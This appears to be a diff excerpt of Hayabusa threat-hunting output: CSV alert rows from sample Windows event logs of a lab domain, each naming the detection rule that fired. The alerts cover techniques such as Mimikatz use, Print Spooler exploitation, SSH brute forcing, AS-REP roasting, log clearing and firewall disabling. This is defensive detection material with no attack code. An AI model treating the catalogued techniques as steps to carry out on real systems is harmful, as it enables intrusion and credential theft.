+2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,critical,DNS Server Error Failed Loading the ServerLevelPluginDLL,,rules/sigma/other/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx
+2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx
+2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx
+2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx
+2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx
+2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx
+2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,critical,DNS Server Error Failed Loading the ServerLevelPluginDLL,,rules/sigma/other/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx
+2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx
+2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx
+2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx
+2021-05-20 21:49:31.863 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx
+2021-05-20 21:49:46.875 +09:00,fs01.offsec.lan,4648,informational,Explicit Logon,Source User: FS01$  :  Target User: sshd_5848  :  IP Address: -  :  Process: C:\Program Files\OpenSSH-Win64\sshd.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx
+2021-05-20 21:49:46.876 +09:00,fs01.offsec.lan,4624,low,Logon Type 5 - Service,User: sshd_5848  :  Workstation: -  :  IP Address: -  :  Port: -  :  LogonID: 0x3c569ed,rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx
+2021-05-20 21:49:46.876 +09:00,fs01.offsec.lan,4672,informational,Admin Logon,User: sshd_5848  :  LogonID: 0x3c569ed,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx
+2021-05-20 21:49:52.315 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER  :  Workstation FS01  :  Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx
+2021-05-20 21:49:52.315 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER  :  Type: 8  :  Workstation: FS01  :  IP Address: -  :  SubStatus: 0xc0000064  :  AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx
+2021-05-20 21:49:52.315 +09:00,-,-,medium,User Guessing Attempt,[condition] count() by IpAddress >= 5 in timeframe [result] count:5 IpAddress:- timeframe:5m,rules/hayabusa/default/alerts/Security/4625_BruteForce_UserGuessingDetect.yml,-
+2021-05-20 21:49:53.378 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER  :  Workstation FS01  :  Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx
+2021-05-20 21:49:53.378 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER  :  Type: 8  :  Workstation: FS01  :  IP Address: -  :  SubStatus: 0xc0000064  :  AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx
+2021-05-20 21:49:54.043 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER  :  Workstation FS01  :  Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx
+2021-05-20 21:49:54.043 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER  :  Type: 8  :  Workstation: FS01  :  IP Address: -  :  SubStatus: 0xc0000064  :  AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx
+2021-05-20 21:49:54.662 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER  :  Workstation FS01  :  Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx
+2021-05-20 21:49:54.662 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER  :  Type: 8  :  Workstation: FS01  :  IP Address: -  :  SubStatus: 0xc0000064  :  AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx
+2021-05-20 21:49:54.945 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER  :  Workstation FS01  :  Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx
+2021-05-20 21:49:54.945 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER  :  Type: 8  :  Workstation: FS01  :  IP Address: -  :  SubStatus: 0xc0000064  :  AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx
+2021-05-22 05:43:07.153 +09:00,fs01.offsec.lan,4648,informational,Explicit Logon,Source User: FS01$  :  Target User: sshd_4332  :  IP Address: -  :  Process: C:\Program Files\OpenSSH-Win64\sshd.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx
+2021-05-22 05:43:07.153 +09:00,fs01.offsec.lan,4624,low,Logon Type 5 - Service,User: sshd_4332  :  Workstation: -  :  IP Address: -  :  Port: -  :  LogonID: 0x47a203c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx
+2021-05-22 05:43:18.227 +09:00,fs01.offsec.lan,4648,informational,Explicit Logon,Source User: FS01$  :  Target User: admmig  :  IP Address: -  :  Process: C:\Program Files\OpenSSH-Win64\sshd.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx
+2021-05-22 05:43:22.562 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan  :  Type: 8  :  Workstation: FS01  :  IP Address: -  :  AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx
+2021-05-22 05:43:22.562 +09:00,-,-,medium,Password Guessing Attack,[condition] count() by IpAddress >= 5 in timeframe [result] count:5 IpAddress:- timeframe:5m,rules/hayabusa/default/alerts/Security/4625_BruteForce_PasswordGuessingDetect.yml,-
+2021-05-22 05:43:49.345 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan  :  Type: 8  :  Workstation: FS01  :  IP Address: -  :  AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx
+2021-05-22 05:43:50.131 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan  :  Type: 8  :  Workstation: FS01  :  IP Address: -  :  AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx
+2021-05-22 05:43:50.607 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan  :  Type: 8  :  Workstation: FS01  :  IP Address: -  :  AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx
+2021-05-22 05:43:50.866 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan  :  Type: 8  :  Workstation: FS01  :  IP Address: -  :  AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx
+2021-05-23 06:56:57.685 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx
+2021-05-23 06:57:11.842 +09:00,fs01.offsec.lan,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx
+2021-05-23 06:57:11.842 +09:00,fs01.offsec.lan,4688,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx
+2021-05-26 22:02:27.149 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.123.11  :  Port: 47156  :  LogonID: 0x312517c1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
+2021-05-26 22:02:27.155 +09:00,mssql01.offsec.lan,5145,critical,CVE-2021-1675 Print Spooler Exploitation IPC Access,,rules/sigma/builtin/security/win_exploit_cve_2021_1675_printspooler_security.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
+2021-05-26 22:02:27.155 +09:00,mssql01.offsec.lan,5145,medium,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
+2021-05-26 22:02:29.726 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.123.11  :  Port: 47160  :  LogonID: 0x31251a6a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
+2021-05-26 22:02:29.734 +09:00,mssql01.offsec.lan,5145,critical,CVE-2021-1675 Print Spooler Exploitation IPC Access,,rules/sigma/builtin/security/win_exploit_cve_2021_1675_printspooler_security.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
+2021-05-26 22:02:29.734 +09:00,mssql01.offsec.lan,5145,medium,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
+2021-05-26 22:02:34.373 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 65333  :  LogonID: 0x31251ce4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
+2021-05-26 22:02:34.375 +09:00,mssql01.offsec.lan,5145,medium,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
+2021-05-26 22:02:34.379 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 65335  :  LogonID: 0x31251d11,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
+2021-05-26 22:02:34.379 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 65336  :  LogonID: 0x31251d23,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
+2021-05-26 22:02:34.380 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 65337  :  LogonID: 0x31251d36,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
+2021-05-27 05:24:46.570 +09:00,rootdc1.offsec.lan,4768,medium,Possible AS-REP Roasting,Possible AS-REP Roasting,rules/hayabusa/default/alerts/Security/4768_StealOrForgeKerberosTickets_AS-REP-Roasting.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-Kerberos AS-REP Roasting.evtx
+2021-05-27 05:24:46.570 +09:00,rootdc1.offsec.lan,4768,informational,Kerberos TGT was requested,User: admin-test  :  Service: krbtgt  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0  :  PreAuthType: 0,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-Kerberos AS-REP Roasting.evtx
+2021-06-01 23:06:34.542 +09:00,fs01.offsec.lan,4720,medium,Local user account created,User: WADGUtilityAccount  :  SID:S-1-5-21-1081258321-37805170-3511562335-1000,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4720,4698-Fortinet APT group abuse on Windows.evtx"
+2021-06-01 23:08:21.225 +09:00,fs01.offsec.lan,4720,medium,Local user account created,User: elie  :  SID:S-1-5-21-1081258321-37805170-3511562335-1001,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4720,4698-Fortinet APT group abuse on Windows.evtx"
+2021-06-01 23:09:38.437 +09:00,-,-,low,Rare Schtasks Creations,[condition] count() by TaskName < 5 in timeframe [result] count:1 TaskName:\\Microsoft\\SynchronizeTimeZone timeframe:7d,rules/sigma/builtin/security/win_rare_schtasks_creations.yml,-
+2021-06-03 21:17:56.988 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1090-Proxy/ID4688-netsh port forwarding abuse.evtx
+2021-06-03 21:18:12.941 +09:00,fs01.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x322e5b7,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1090-Proxy/ID4688-netsh port forwarding abuse.evtx
+2021-06-03 21:18:12.942 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 56061  :  LogonID: 0x322e5b7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1090-Proxy/ID4688-netsh port forwarding abuse.evtx
+2021-06-04 03:34:12.672 +09:00,fs01.offsec.lan,4104,high,Windows Firewall Profile Disabled,,rules/sigma/powershell/powershell_script/powershell_windows_firewall_profile_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID800-4103-Firewall disabled.evtx
+2021-06-04 04:17:44.873 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx
+2021-06-04 04:39:52.893 +09:00,fs01.offsec.lan,2003,low,USB Device Plugged,,rules/sigma/other/driverframeworks/win_usb_device_plugged.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx
+2021-06-04 04:39:52.895 +09:00,fs01.offsec.lan,2003,low,USB Device Plugged,,rules/sigma/other/driverframeworks/win_usb_device_plugged.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx
+2021-06-04 04:39:53.056 +09:00,fs01.offsec.lan,2003,low,USB Device Plugged,,rules/sigma/other/driverframeworks/win_usb_device_plugged.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx
+2021-06-04 17:41:47.982 +09:00,exchange01.offsec.lan,6,high,Failed MSExchange Transport Agent Installation,,rules/sigma/other/msexchange/win_exchange_transportagent_failed.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505-Server Software Component/ID6-Failed to install an Exchange transport agent.evtx
+2021-06-04 17:41:48.041 +09:00,exchange01.offsec.lan,6,high,Failed MSExchange Transport Agent Installation,,rules/sigma/other/msexchange/win_exchange_transportagent_failed.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505-Server Software Component/ID6-Failed to install an Exchange transport agent.evtx
+2021-06-10 04:29:58.239 +09:00,fs01.offsec.lan,20,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID19-20-WMI registration via PowerLurk.evtx
+2021-06-10 04:29:58.240 +09:00,fs01.offsec.lan,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID19-20-WMI registration via PowerLurk.evtx
+2021-06-10 04:29:58.392 +09:00,fs01.offsec.lan,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID19-20-WMI registration via PowerLurk.evtx
+2021-06-11 06:21:20.636 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 51503  :  LogonID: 0x5a4175e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
+2021-06-11 06:21:26.357 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.123.11  :  Port: 56594  :  LogonID: 0x5a41984,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
+2021-06-11 06:21:26.383 +09:00,-,-,low,Rare Schtasks Creations,[condition] count() by TaskName < 5 in timeframe [result] count:2 TaskName:\\bouWFQYO timeframe:7d,rules/sigma/builtin/security/win_rare_schtasks_creations.yml,-
+2021-06-11 06:21:26.406 +09:00,fs01.offsec.lan,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by ATexec (susp. arg.).evtx
+2021-06-11 06:21:26.406 +09:00,fs01.offsec.lan,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
+2021-06-11 06:21:26.415 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: Temp\bouWFQYO.tmp  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx
+2021-06-11 06:21:26.415 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: Temp\bouWFQYO.tmp  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
+2021-06-11 06:21:29.427 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: Temp\bouWFQYO.tmp  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx
+2021-06-11 06:21:29.427 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: Temp\bouWFQYO.tmp  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
+2021-06-11 06:21:29.441 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: Temp\bouWFQYO.tmp  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx
